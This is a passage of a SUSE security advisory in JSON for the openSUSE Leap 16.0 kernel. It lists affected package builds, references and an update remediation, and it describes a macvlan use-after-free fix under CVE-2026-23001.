"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T13:03:55Z",
"details": "moderate"
}
],
"title": "CVE-2026-23000"
},
{
"cve": "CVE-2026-23001",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2026-23001"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nmacvlan: fix possible UAF in macvlan_forward_source()\n\nAdd RCU protection on (struct macvlan_source_entry)-\u003evlan.\n\nWhenever macvlan_hash_del_source() is called, we must clear\nentry-\u003evlan pointer before RCU grace period starts.\n\nThis allows macvlan_forward_source() to skip over\nentries queued for freeing.\n\nNote that macvlan_dev are already RCU protected, as they\nare embedded in a standard netdev (netdev_priv(ndev)).\n\nhttps: //lore.kernel.org/netdev/695fb1e8.050a0220.1c677c.039f.GAE@google.com/T/#u",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2026-23001",
"url": "https://www.suse.com/security/cve/CVE-2026-23001"
},
{
"category": "external",
"summary": "SUSE Bug 1257232 for CVE-2026-23001",
"url": "https://bugzilla.suse.com/1257232"
},
{
"category": "external",
"summary": "SUSE Bug 1257233 for CVE-2026-23001",
"url": "https://bugzilla.suse.com/1257233"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
